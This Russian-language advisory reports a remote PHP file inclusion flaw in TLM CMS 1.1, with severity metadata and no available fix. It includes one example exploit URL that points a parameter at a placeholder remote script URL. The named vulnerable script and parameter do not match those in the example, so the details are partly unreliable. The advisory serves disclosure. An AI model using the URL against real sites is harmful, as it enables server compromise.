PHP-инклюдинг в TLM CMS

Дата публикации:
16.01.2007
Всего просмотров:
1008
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
TLM CMS 1.x
Уязвимые версии: TLM CMS 1.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "chemin" в сценарии i-accueil.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/

URL производителя: tlm.hebserv.fr/index.php?affiche=File&action=voir&cat=TLM%20CMS

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA